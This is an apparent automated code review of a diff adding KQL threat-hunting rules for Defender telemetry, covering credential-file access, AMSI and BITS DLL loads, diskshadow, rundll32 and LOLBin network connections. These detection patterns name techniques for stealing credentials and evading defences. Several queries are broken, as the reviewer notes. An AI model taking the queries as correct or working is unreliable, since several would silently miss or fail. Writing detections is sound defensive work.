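Review bot: The PFX rule's description body (`PFX files contain private keys ...`, the three indented bullets and `Analysts should investigate ...`) is written without the `//` prefix, so the file does not parse; every non-blank continuation line needs `// `. The query also has no `ActionType == "FileCreated"` predicate although the title is "PFX File Creation", so edits, renames and deletions of existing .pfx files are reported as well — add `| where ActionType == "FileCreated"` before the path filter. The CMake/Visual Studio exclusions are `FolderPath startswith "C:\\Program Files..."` prefixes; writing there already requires local admin, so that is an acceptable trade-off for a hunt, but it belongs in the False Positives block rather than being implicit.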
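Review bot: The findstr keyword list contains non-ASCII literals (`"contraseña"`, `"hasło"`, `"密碼"`), so the generated .kql must be written and committed as UTF-8; if the converter opens its output with the platform default encoding (cp1252 on Windows) these literals become mojibake or the write raises — that cannot be told from the diff, so confirm the script uses `encoding="utf-8"` and add a `// NOTE: file must be UTF-8` line to the header. `contains "passe"` also matches `passed`/`passenger` and `contains "parola"` is a common word on its own; for a findstr-scoped hunt that is tolerable, but the file has no False Positives block and should get one.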
@@ -0,0 +1,12 @@
+// Title: Unattend.XML File Access Attempt
+// Author: frack113
+// Date: 2024-07-22
+// Level: low
+// Description: Detects attempts to access the "unattend.xml" file, where credentials might be stored.
+This file is used during the unattended windows install process.
+
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1552.001, detection.threat-hunting
+
+DeviceFileEvents
+| where FileName endswith "\\Panther\\unattend.xml"
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/Defense Evasion/access_to_reg_hive_files_by_uncommon_applications.kql b/KQL/rules-threat-hunting/Defense Evasion/access_to_reg_hive_files_by_uncommon_applications.kql
new file mode 100644
index 00000000..fd5762fa
--- /dev/null
+++ b/KQL/rules-threat-hunting/Defense Evasion/access_to_reg_hive_files_by_uncommon_applications.kql
@@ -0,0 +1,12 @@
+// Title: Access To .Reg/.Hive Files By Uncommon Applications
+// Author: frack113
+// Date: 2023-09-15
+// Level: low
+// Description: Detects file access requests to files ending with either the ".hive"/".reg" extension, usually associated with Windows Registry backups.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.t1112, attack.defense-evasion, attack.persistence, detection.threat-hunting
+// False Positives:
+// - Third party software installed in the user context might generate a lot of FPs. Heavy baselining and tuning might be required.
+
+DeviceFileEvents
+| where (FileName endswith ".hive" or FileName endswith ".reg") and (not((InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\System32\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\SysWOW64\\")))
\ No newline at end of file
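Review bot: `FileName endswith "\\Panther\\unattend.xml"` tests the leaf file name against a path suffix, which in DeviceFileEvents can never match; use `FolderPath endswith "\\Panther\\unattend.xml"`, or `FileName =~ "unattend.xml"` if any location is of interest. The continuation line `This file is used during the unattended windows install process.` also needs the `//` prefix or the query fails to parse. Since MDE does not record plain file reads as far as I know, an "access attempt" rule will at best catch copies, renames and deletes of the file in this telemetry — state that in the header so nobody assumes read coverage. The file has no False Positives block; image-deployment and provisioning tooling (MDT/SCCM task sequences, sysprep) should be listed.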
diff --git a/KQL/rules-threat-hunting/Defense Evasion/access_to_windows_outlook_mail_files_by_uncommon_applications.kql b/KQL/rules-threat-hunting/Defense Evasion/access_to_windows_outlook_mail_files_by_uncommon_applications.kql
new file mode 100644
index 00000000..12150d0e
--- /dev/null
+++ b/KQL/rules-threat-hunting/Defense Evasion/access_to_windows_outlook_mail_files_by_uncommon_applications.kql
@@ -0,0 +1,18 @@
+// Title: Access To Windows Outlook Mail Files By Uncommon Applications
+// Author: frack113
+// Date: 2024-05-10
+// Level: low
+// Description: Detects file access requests to Windows Outlook Mail by uncommon processes.
+Could indicate potential attempt of credential stealing.
+Requires heavy baselining before usage
+
+// MITRE Tactic: Defense Evasion
+// Tags: attack.t1070.008, attack.defense-evasion, detection.threat-hunting
+// False Positives:
+// - Antivirus, Anti-Spyware, Anti-Malware Software
+// - Backup software
+// - Legitimate software installed on partitions other than "C:\"
+// - Searching software such as "everything.exe"
+
+DeviceFileEvents
+| where (FileName contains "\\AppData\\Local\\Comms\\Unistore\\data" or FileName endswith "\\AppData\\Local\\Comms\\UnistoreDB\\store.vol") and (not(((InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\system32\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\SysWOW64\\") or InitiatingProcessFolderPath =~ "System"))) and (not((((InitiatingProcessFolderPath endswith "\\MpCopyAccelerator.exe" or InitiatingProcessFolderPath endswith "\\MsMpEng.exe") and InitiatingProcessFolderPath startswith "C:\\ProgramData\\Microsoft\\Windows Defender\\") or (InitiatingProcessFolderPath endswith "\\thor64.exe" or InitiatingProcessFolderPath endswith "\\thor.exe"))))
\ No newline at end of file
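Review bot: `FileName contains "\\AppData\\Local\\Comms\\Unistore\\data"` and `FileName endswith "\\AppData\\Local\\Comms\\UnistoreDB\\store.vol"` cannot match because `FileName` in DeviceFileEvents carries no directory component; put both predicates on `FolderPath`, as the .pfx and Zone.Identifier rules in this patch do. The two continuation lines `Could indicate potential attempt of credential stealing.` and `Requires heavy baselining before usage` lack `//` and break the file on their own. The description text appears copied from the browser-credential rule and talks about credential stealing while the tag is `attack.t1070.008` (mailbox data); that wording may be upstream's, but a one-line `// Note:` on what is actually being hunted here (mail store tampering/exfil rather than credentials) would avoid misleading the analyst.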
diff --git a/KQL/rules-threat-hunting/Defense Evasion/ads_zone_identifier_deleted.kql b/KQL/rules-threat-hunting/Defense Evasion/ads_zone_identifier_deleted.kql
new file mode 100644
index 00000000..79bc3f45
--- /dev/null
+++ b/KQL/rules-threat-hunting/Defense Evasion/ads_zone_identifier_deleted.kql
@@ -0,0 +1,12 @@
+// Title: ADS Zone.Identifier Deleted
+// Author: frack113
+// Date: 2023-09-04
+// Level: low
+// Description: Detects the deletion of the "Zone.Identifier" ADS. Attackers can leverage this in order to bypass security restrictions that make use of the ADS such as Microsoft Office apps.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1070.004, detection.threat-hunting
+// False Positives:
+// - Likely
+
+DeviceFileEvents
+| where FolderPath endswith ":Zone.Identifier"
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/Defense Evasion/amsi_dll_load_by_uncommon_process.kql b/KQL/rules-threat-hunting/Defense Evasion/amsi_dll_load_by_uncommon_process.kql
new file mode 100644
index 00000000..0e137233
--- /dev/null
+++ b/KQL/rules-threat-hunting/Defense Evasion/amsi_dll_load_by_uncommon_process.kql
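Review bot: The title is "ADS Zone.Identifier Deleted" but the query has no `ActionType` predicate, so it returns every event on a `:Zone.Identifier` stream — including the Mark-of-the-Web being written on every browser download — which is the opposite of the stated intent and is presumably why the FP line just says "Likely". Add `| where ActionType == "FileDeleted"` before the path check, and expand the False Positives entry to name the legitimate unblockers (Explorer "Unblock", `Unblock-File`, installers). Whether MDE exposes the ADS path in `FolderPath` at all should be confirmed with a quick `FolderPath contains ":Zone.Identifier"` run against live data before this is relied on.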
@@ -0,0 +1,12 @@ +// Title: Amsi.DLL Load By Uncommon Process +// Author: frack113 +// Date: 2023-03-12 +// Level: low +// Description: Detects loading of Amsi.dll by uncommon processes +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.impact, attack.t1490, detection.threat-hunting +// False Positives: +// - Legitimate third party apps installed in "ProgramData" and "AppData" might generate some false positives. Apply additional filters accordingly + +DeviceImageLoadEvents +| where FolderPath endswith "\\amsi.dll" and (not((((InitiatingProcessFolderPath contains ":\\Windows\\Microsoft.NET\\Framework\\" or InitiatingProcessFolderPath contains ":\\Windows\\Microsoft.NET\\Framework64\\" or InitiatingProcessFolderPath contains ":\\Windows\\Microsoft.NET\\FrameworkArm\\" or InitiatingProcessFolderPath contains ":\\Windows\\Microsoft.NET\\FrameworkArm64\\") and InitiatingProcessFolderPath endswith "\\ngentask.exe") or InitiatingProcessFolderPath =~ "" or (InitiatingProcessFolderPath endswith ":\\Windows\\explorer.exe" or InitiatingProcessFolderPath endswith ":\\Windows\\Sysmon64.exe") or (InitiatingProcessFolderPath contains ":\\Program Files (x86)\\" or InitiatingProcessFolderPath contains ":\\Program Files\\" or InitiatingProcessFolderPath contains ":\\Windows\\System32\\" or InitiatingProcessFolderPath contains ":\\Windows\\SysWOW64\\" or InitiatingProcessFolderPath contains ":\\Windows\\WinSxS\\") or isnull(InitiatingProcessFolderPath)))) and (not((InitiatingProcessFolderPath contains ":\\ProgramData\\Microsoft\\Windows Defender\\Platform\\" and InitiatingProcessFolderPath endswith "\\MsMpEng.exe"))) \ No newline at end of file diff --git a/KQL/rules-threat-hunting/Defense Evasion/bits_client_bitsproxy_dll_loaded_by_uncommon_process.kql b/KQL/rules-threat-hunting/Defense Evasion/bits_client_bitsproxy_dll_loaded_by_uncommon_process.kql new file mode 100644 index 00000000..c25c1963 --- /dev/null 
+++ b/KQL/rules-threat-hunting/Defense Evasion/bits_client_bitsproxy_dll_loaded_by_uncommon_process.kql @@ -0,0 +1,14 @@ +// Title: BITS Client BitsProxy DLL Loaded By Uncommon Process +// Author: UnicornOfHunt +// Date: 2025-06-04 +// Level: low +// Description: Detects an uncommon process loading the "BitsProxy.dll". This DLL is used when the BITS COM instance or API is used. +This detection can be used to hunt for uncommon processes loading this DLL in your environment. Which may indicate potential suspicious activity occurring. + +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.persistence, attack.t1197, detection.threat-hunting +// False Positives: +// - Allowed binaries in the environment that do BITS Jobs + +DeviceImageLoadEvents +| where FolderPath endswith "\\BitsProxy.dll" and (not((InitiatingProcessFolderPath in~ ("C:\\Windows\\System32\\aitstatic.exe", "C:\\Windows\\System32\\bitsadmin.exe", "C:\\Windows\\System32\\desktopimgdownldr.exe", "C:\\Windows\\System32\\DeviceEnroller.exe", "C:\\Windows\\System32\\MDMAppInstaller.exe", "C:\\Windows\\System32\\ofdeploy.exe", "C:\\Windows\\System32\\RecoveryDrive.exe", "C:\\Windows\\System32\\Speech_OneCore\\common\\SpeechModelDownload.exe", "C:\\Windows\\SysWOW64\\bitsadmin.exe", "C:\\Windows\\SysWOW64\\OneDriveSetup.exe", "C:\\Windows\\SysWOW64\\Speech_OneCore\\Common\\SpeechModelDownload.exe")))) and (not(InitiatingProcessFolderPath =~ "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe")) \ No newline at end of file diff --git a/KQL/rules-threat-hunting/Defense Evasion/codepage_modification_via_mode_com.kql b/KQL/rules-threat-hunting/Defense Evasion/codepage_modification_via_mode_com.kql new file mode 100644 index 00000000..e433f0e5 --- /dev/null +++ b/KQL/rules-threat-hunting/Defense Evasion/codepage_modification_via_mode_com.kql 
@@ -0,0 +1,12 @@ +// Title: CodePage Modification Via MODE.COM +// Author: Nasreddine Bencherchali (Nextron Systems), Joseliyo Sanchez, @Joseliyo_Jstnk +// Date: 2024-01-19 +// Level: low +// Description: Detects a CodePage modification using the "mode.com" utility. +This behavior has been used by threat actors behind Dharma ransomware. + +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1036, detection.threat-hunting + +DeviceProcessEvents +| where (ProcessCommandLine contains " con " and ProcessCommandLine contains " cp " and ProcessCommandLine contains " select=") and (FolderPath endswith "\\mode.com" or ProcessVersionInfoOriginalFileName =~ "MODE.COM") \ No newline at end of file diff --git a/KQL/rules-threat-hunting/Defense Evasion/diskshadow_child_process_spawned.kql b/KQL/rules-threat-hunting/Defense Evasion/diskshadow_child_process_spawned.kql new file mode 100644 index 00000000..b35244e3 --- /dev/null +++ b/KQL/rules-threat-hunting/Defense Evasion/diskshadow_child_process_spawned.kql @@ -0,0 +1,12 @@ +// Title: Diskshadow Child Process Spawned +// Author: Harjot Singh @cyb3rjy0t +// Date: 2023-09-15 +// Level: medium +// Description: Detects any child process spawning from "Diskshadow.exe". This could be due to executing Diskshadow in interpreter mode or script mode and using the "exec" flag to launch other applications. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218, attack.execution, detection.threat-hunting +// False Positives: +// - Likely from legitimate usage of Diskshadow in Interpreter mode. + +DeviceProcessEvents +| where InitiatingProcessFolderPath endswith "\\diskshadow.exe" and (not(FolderPath endswith ":\\Windows\\System32\\WerFault.exe")) \ No newline at end of file diff --git a/KQL/rules-threat-hunting/Defense Evasion/diskshadow_script_mode_execution.kql b/KQL/rules-threat-hunting/Defense Evasion/diskshadow_script_mode_execution.kql new file mode 100644 index 00000000..c4dbc326 
--- /dev/null
+++ b/KQL/rules-threat-hunting/Defense Evasion/diskshadow_script_mode_execution.kql
@@ -0,0 +1,13 @@
+// Title: Diskshadow Script Mode Execution
+// Author: Ivan Dyachkov, oscd.community
+// Date: 2020-10-07
+// Level: medium
+// Description: Detects execution of "Diskshadow.exe" in script mode using the "/s" flag. Attackers often abuse "diskshadow" to execute scripts that deleted the shadow copies on the systems. Investigate the content of the scripts and its location.
+
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218, attack.execution, detection.threat-hunting
+// False Positives:
+// - Likely from legitimate backup scripts
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "-s " or ProcessCommandLine contains "/s " or ProcessCommandLine contains "–s " or ProcessCommandLine contains "—s " or ProcessCommandLine contains "―s ") and (ProcessVersionInfoOriginalFileName =~ "diskshadow.exe" or FolderPath endswith "\\diskshadow.exe")
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/Defense Evasion/dll_call_by_ordinal_via_rundll32_exe.kql b/KQL/rules-threat-hunting/Defense Evasion/dll_call_by_ordinal_via_rundll32_exe.kql
new file mode 100644
index 00000000..7f88518a
--- /dev/null
+++ b/KQL/rules-threat-hunting/Defense Evasion/dll_call_by_ordinal_via_rundll32_exe.kql
@@ -0,0 +1,13 @@ +// Title: DLL Call by Ordinal Via Rundll32.EXE +// Author: Florian Roth (Nextron Systems) +// Date: 2019-10-22 +// Level: medium +// Description: Detects calls of DLLs exports by ordinal numbers via rundll32.dll. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218.011, detection.threat-hunting +// False Positives: +// - False positives depend on scripts and administrative tools used in the monitored environment. +// - Windows control panel elements have been identified as source (mmc). + +DeviceProcessEvents +| where ((ProcessCommandLine contains ",#" or ProcessCommandLine contains ", #" or ProcessCommandLine contains ".dll #" or ProcessCommandLine contains ".ocx #") and (FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE")) and (not(((ProcessCommandLine contains "EDGEHTML.dll" and ProcessCommandLine contains "#141") or ((ProcessCommandLine contains "\\FileTracker32.dll,#1" or ProcessCommandLine contains "\\FileTracker32.dll\",#1" or ProcessCommandLine contains "\\FileTracker64.dll,#1" or ProcessCommandLine contains "\\FileTracker64.dll\",#1") and (InitiatingProcessFolderPath contains "\\Msbuild\\Current\\Bin\\" or InitiatingProcessFolderPath contains "\\VC\\Tools\\MSVC\\" or InitiatingProcessFolderPath contains "\\Tracker.exe"))))) \ No newline at end of file diff --git a/KQL/rules-threat-hunting/Defense Evasion/dllhost_exe_initiated_network_connection_to_non_local_ip_address.kql b/KQL/rules-threat-hunting/Defense Evasion/dllhost_exe_initiated_network_connection_to_non_local_ip_address.kql new file mode 100644 index 00000000..252d516e --- /dev/null +++ b/KQL/rules-threat-hunting/Defense Evasion/dllhost_exe_initiated_network_connection_to_non_local_ip_address.kql 
@@ -0,0 +1,15 @@ +// Title: Dllhost.EXE Initiated Network Connection To Non-Local IP Address +// Author: bartblaze +// Date: 2020-07-13 +// Level: medium +// Description: Detects Dllhost.EXE initiating a network connection to a non-local IP address. +Aside from Microsoft own IP range that needs to be excluded. Network communication from Dllhost will depend entirely on the hosted DLL. +An initial baseline is recommended before deployment. + +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218, attack.execution, attack.t1559.001, detection.threat-hunting +// False Positives: +// - Communication to other corporate systems that use IP addresses from public address spaces + +DeviceNetworkEvents +| where InitiatingProcessFolderPath endswith "\\dllhost.exe" and (not(((ipv4_is_in_range(RemoteIP, "::1/128") or ipv4_is_in_range(RemoteIP, "10.0.0.0/8") or ipv4_is_in_range(RemoteIP, "127.0.0.0/8") or ipv4_is_in_range(RemoteIP, "172.16.0.0/12") or ipv4_is_in_range(RemoteIP, "192.168.0.0/16") or ipv4_is_in_range(RemoteIP, "169.254.0.0/16") or ipv4_is_in_range(RemoteIP, "fc00::/7") or ipv4_is_in_range(RemoteIP, "fe80::/10")) or (ipv4_is_in_range(RemoteIP, "20.184.0.0/13") or ipv4_is_in_range(RemoteIP, "20.192.0.0/10") or ipv4_is_in_range(RemoteIP, "23.72.0.0/13") or ipv4_is_in_range(RemoteIP, "51.10.0.0/15") or ipv4_is_in_range(RemoteIP, "51.103.0.0/16") or ipv4_is_in_range(RemoteIP, "51.104.0.0/15") or ipv4_is_in_range(RemoteIP, "52.224.0.0/11") or ipv4_is_in_range(RemoteIP, "150.171.0.0/19") or ipv4_is_in_range(RemoteIP, "204.79.197.0/24"))))) \ No newline at end of file diff --git a/KQL/rules-threat-hunting/Defense Evasion/dmp_hdmp_file_creation.kql b/KQL/rules-threat-hunting/Defense Evasion/dmp_hdmp_file_creation.kql new file mode 100644 index 00000000..0928d6d1 --- /dev/null +++ b/KQL/rules-threat-hunting/Defense Evasion/dmp_hdmp_file_creation.kql 
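Review bot: `ipv4_is_in_range(RemoteIP, "::1/128")`, `"fc00::/7"` and `"fe80::/10"` hand IPv6 prefixes to an IPv4-only function; these three checks should be `ipv6_is_in_range(RemoteIP, "::1/128")` (and likewise for the other two) so that IPv6 loopback and link-local connections are actually excluded. Because the IPv4 function returns null for a range it cannot parse, the `or` chain may evaluate to null for every public IPv4 address, and `not(null)` is discarded by `where`, which would leave this rule returning nothing at all — confirm against real data before shipping. The uncommented description lines `Aside from Microsoft own IP range ...` and `An initial baseline ...` also need a `//` prefix to be valid KQL.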
@@ -0,0 +1,12 @@
+// Title: DMP/HDMP File Creation
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-09-07
+// Level: low
+// Description: Detects the creation of a file with the ".dmp"/".hdmp" extension. Often created by software during a crash. Memory dumps can sometimes contain sensitive information such as credentials. It's best to determine the source of the crash.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, detection.threat-hunting
+// False Positives:
+// - Likely during crashes of software
+
+DeviceFileEvents
+| where FolderPath endswith ".dmp" or FolderPath endswith ".dump" or FolderPath endswith ".hdmp"
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/Defense Evasion/dynamic_net_compilation_via_csc_exe_hunting.kql b/KQL/rules-threat-hunting/Defense Evasion/dynamic_net_compilation_via_csc_exe_hunting.kql
new file mode 100644
index 00000000..efea574b
--- /dev/null
+++ b/KQL/rules-threat-hunting/Defense Evasion/dynamic_net_compilation_via_csc_exe_hunting.kql
@@ -0,0 +1,12 @@
+// Title: Dynamic .NET Compilation Via Csc.EXE - Hunting
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-08-02
+// Level: medium
+// Description: Detects execution of "csc.exe" to compile .NET code. Attackers often leverage this to compile code on the fly and use it in other stages.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1027.004, detection.threat-hunting
+// False Positives:
+// - Many legitimate applications make use of dynamic compilation. Use this rule to hunt for anomalies
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "/noconfig /fullpaths @" and FolderPath endswith "\\csc.exe"
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/Defense Evasion/file_or_folder_permissions_modifications.kql b/KQL/rules-threat-hunting/Defense Evasion/file_or_folder_permissions_modifications.kql
new file mode 100644
index 00000000..9bc12b94
--- /dev/null
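Review bot: The title says "File Creation", but `FolderPath endswith ".dmp" or FolderPath endswith ".dump" or FolderPath endswith ".hdmp"` is not constrained by ActionType, so modifications, renames and deletions of dump files will also match and the low-level rule becomes noisier than intended; add `ActionType == "FileCreated" and` in front of the extension checks. The `.dump` extension is matched but not mentioned in the description, so either document it or drop it.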
+++ b/KQL/rules-threat-hunting/Defense Evasion/file_or_folder_permissions_modifications.kql @@ -0,0 +1,13 @@ +// Title: File or Folder Permissions Modifications +// Author: Jakob Weinzettl, oscd.community, Nasreddine Bencherchali (Nextron Systems) +// Date: 2019-10-23 +// Level: medium +// Description: Detects a file or folder's permissions being modified or tampered with. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1222.001, detection.threat-hunting +// False Positives: +// - Users interacting with the files on their own (unlikely unless privileged users). +// - Dynatrace app + +DeviceProcessEvents +| where (((ProcessCommandLine contains "/grant" or ProcessCommandLine contains "/setowner" or ProcessCommandLine contains "/inheritance:r") and (FolderPath endswith "\\cacls.exe" or FolderPath endswith "\\icacls.exe" or FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe")) or (ProcessCommandLine contains "-r" and FolderPath endswith "\\attrib.exe") or FolderPath endswith "\\takeown.exe") and (not(((ProcessCommandLine contains ":\\Program Files (x86)\\Avira" or ProcessCommandLine contains ":\\Program Files\\Avira") or ProcessCommandLine endswith "ICACLS C:\\ProgramData\\dynatrace\\gateway\\config\\connectivity.history /reset" or (ProcessCommandLine contains "ICACLS C:\\ProgramData\\dynatrace\\gateway\\config\\config.properties /grant :r " and ProcessCommandLine contains "S-1-5-19:F") or (ProcessCommandLine contains "\\AppData\\Local\\Programs\\Microsoft VS Code" or ProcessCommandLine contains ":\\Program Files\\Microsoft VS Code")))) \ No newline at end of file diff --git a/KQL/rules-threat-hunting/Defense Evasion/headless_process_launched_via_conhost_exe.kql b/KQL/rules-threat-hunting/Defense Evasion/headless_process_launched_via_conhost_exe.kql new file mode 100644 index 00000000..8fa5768b --- /dev/null +++ b/KQL/rules-threat-hunting/Defense Evasion/headless_process_launched_via_conhost_exe.kql 
@@ -0,0 +1,12 @@ +// Title: Headless Process Launched Via Conhost.EXE +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2024-07-23 +// Level: medium +// Description: Detects the launch of a child process via "conhost.exe" with the "--headless" flag. +The "--headless" flag hides the windows from the user upon execution. + +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.execution, attack.t1059.001, attack.t1059.003, detection.threat-hunting + +DeviceProcessEvents +| where InitiatingProcessCommandLine contains "--headless" and InitiatingProcessFolderPath endswith "\\conhost.exe" \ No newline at end of file diff --git a/KQL/rules-threat-hunting/Defense Evasion/hh_exe_initiated_http_network_connection.kql b/KQL/rules-threat-hunting/Defense Evasion/hh_exe_initiated_http_network_connection.kql new file mode 100644 index 00000000..34135174 --- /dev/null +++ b/KQL/rules-threat-hunting/Defense Evasion/hh_exe_initiated_http_network_connection.kql @@ -0,0 +1,13 @@ +// Title: HH.EXE Initiated HTTP Network Connection +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-10-05 +// Level: medium +// Description: Detects a network connection initiated by the "hh.exe" process to HTTP destination ports, which could indicate the execution/download of remotely hosted .chm files. + +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218.001, detection.threat-hunting +// False Positives: +// - False positive is expected from launching "hh.exe" for the first time on a machine in a while or simply from help files containing reference to external sources. Best correlate this with process creation and file events. + +DeviceNetworkEvents +| where (RemotePort in~ ("80", "443")) and InitiatingProcessFolderPath endswith "\\hh.exe" \ No newline at end of file 
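Review bot: `RemotePort in~ ("80", "443")` applies the case-insensitive string operator to the integer RemotePort column with string literals; KQL will either reject the expression or silently coerce, so this should be `RemotePort in (80, 443)`. The same pattern is produced for the msiexec network rule in this patch, which suggests the converter's port handling emits every value as a string and is the place to fix it.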
diff --git a/KQL/rules-threat-hunting/Defense Evasion/invocation_of_crypto_classes_from_the_cryptography_powershell_namespace.kql b/KQL/rules-threat-hunting/Defense Evasion/invocation_of_crypto_classes_from_the_cryptography_powershell_namespace.kql new file mode 100644 index 00000000..ec7342ce --- /dev/null +++ b/KQL/rules-threat-hunting/Defense Evasion/invocation_of_crypto_classes_from_the_cryptography_powershell_namespace.kql @@ -0,0 +1,15 @@ +// Title: Invocation Of Crypto-Classes From The "Cryptography" PowerShell Namespace +// Author: Andreas Braathen (mnemonic.io) +// Date: 2023-12-01 +// Level: medium +// Description: Detects the invocation of PowerShell commands with references to classes from the "System.Security.Cryptography" namespace. +The PowerShell namespace "System.Security.Cryptography" provides classes for on-the-fly encryption and decryption. +These can be used for example in decrypting malicious payload for defense evasion. + +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.execution, attack.t1059.001, attack.t1027.010, detection.threat-hunting +// False Positives: +// - Classes are legitimately used, but less so when e.g. parents with low prevalence or decryption of content in temporary folders. + +DeviceProcessEvents +| where (ProcessCommandLine contains ".AesCryptoServiceProvider" or ProcessCommandLine contains ".DESCryptoServiceProvider" or ProcessCommandLine contains ".DSACryptoServiceProvider" or ProcessCommandLine contains ".RC2CryptoServiceProvider" or ProcessCommandLine contains ".Rijndael" or ProcessCommandLine contains ".RSACryptoServiceProvider" or ProcessCommandLine contains ".TripleDESCryptoServiceProvider") and ProcessCommandLine contains "System.Security.Cryptography." and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll"))) \ No newline at end of file 
diff --git a/KQL/rules-threat-hunting/Defense Evasion/microsoft_office_trusted_location_updated.kql b/KQL/rules-threat-hunting/Defense Evasion/microsoft_office_trusted_location_updated.kql new file mode 100644 index 00000000..5676791a --- /dev/null +++ b/KQL/rules-threat-hunting/Defense Evasion/microsoft_office_trusted_location_updated.kql @@ -0,0 +1,12 @@ +// Title: Microsoft Office Trusted Location Updated +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-06-21 +// Level: medium +// Description: Detects changes to the registry keys related to "Trusted Location" of Microsoft Office. Attackers might add additional trusted locations to avoid macro security restrictions. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.persistence, attack.t1112, detection.threat-hunting +// False Positives: +// - During office installations or setup, trusted locations are added, which will trigger this rule. + +DeviceRegistryEvents +| where (RegistryKey contains "Security\\Trusted Locations\\Location" and RegistryKey endswith "\\Path") and (not(((InitiatingProcessFolderPath contains ":\\Program Files\\Microsoft Office\\" or InitiatingProcessFolderPath contains ":\\Program Files (x86)\\Microsoft Office\\") or (InitiatingProcessFolderPath contains ":\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\" and InitiatingProcessFolderPath endswith "\\OfficeClickToRun.exe")))) \ No newline at end of file diff --git a/KQL/rules-threat-hunting/Defense Evasion/microsoft_workflow_compiler_execution.kql b/KQL/rules-threat-hunting/Defense Evasion/microsoft_workflow_compiler_execution.kql new file mode 100644 index 00000000..8ba554cb --- /dev/null +++ b/KQL/rules-threat-hunting/Defense Evasion/microsoft_workflow_compiler_execution.kql 
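Review bot: `RegistryKey endswith "\\Path"` will not match in MDE, because DeviceRegistryEvents splits the value name out of the key path into RegistryValueName; the condition should read `RegistryKey contains "Security\\Trusted Locations\\Location" and RegistryValueName =~ "Path"`. Since the rule is about trusted locations being added, consider also restricting to `ActionType in ("RegistryValueSet", "RegistryKeyCreated")` so deletions during uninstall do not fire it.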
@@ -0,0 +1,13 @@ +// Title: Microsoft Workflow Compiler Execution +// Author: Nik Seetharaman, frack113 +// Date: 2019-01-16 +// Level: medium +// Description: Detects the execution of Microsoft Workflow Compiler, which may permit the execution of arbitrary unsigned code. + +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.execution, attack.t1127, attack.t1218, detection.threat-hunting +// False Positives: +// - Legitimate MWC use (unlikely in modern enterprise environments) + +DeviceProcessEvents +| where FolderPath endswith "\\Microsoft.Workflow.Compiler.exe" or ProcessVersionInfoOriginalFileName =~ "Microsoft.Workflow.Compiler.exe" \ No newline at end of file diff --git a/KQL/rules-threat-hunting/Defense Evasion/msiexec_exe_initiated_network_connection_over_http.kql b/KQL/rules-threat-hunting/Defense Evasion/msiexec_exe_initiated_network_connection_over_http.kql new file mode 100644 index 00000000..98995797 --- /dev/null +++ b/KQL/rules-threat-hunting/Defense Evasion/msiexec_exe_initiated_network_connection_over_http.kql @@ -0,0 +1,15 @@ +// Title: Msiexec.EXE Initiated Network Connection Over HTTP +// Author: frack113 +// Date: 2022-01-16 +// Level: low +// Description: Detects a network connection initiated by an "Msiexec.exe" process over port 80 or 443. +Adversaries might abuse "msiexec.exe" to install and execute remotely hosted packages. +Use this rule to hunt for potentially anomalous or suspicious communications. + +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218.007, detection.threat-hunting +// False Positives: +// - Likely + +DeviceNetworkEvents +| where (RemotePort in~ ("80", "443")) and InitiatingProcessFolderPath endswith "\\msiexec.exe" \ No newline at end of file 
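Review bot: `RemotePort in~ ("80", "443")` compares the integer RemotePort column with string literals through the string-only `in~` operator; use `RemotePort in (80, 443)` instead. The description continuation lines `Adversaries might abuse "msiexec.exe" ...` and `Use this rule to hunt ...` are emitted without `//` and make the file invalid KQL when pasted as a whole.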
